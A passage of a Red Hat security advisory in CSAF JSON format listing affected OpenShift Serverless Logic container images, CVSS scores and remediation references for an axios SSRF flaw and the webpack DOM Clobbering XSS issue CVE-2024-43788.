"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
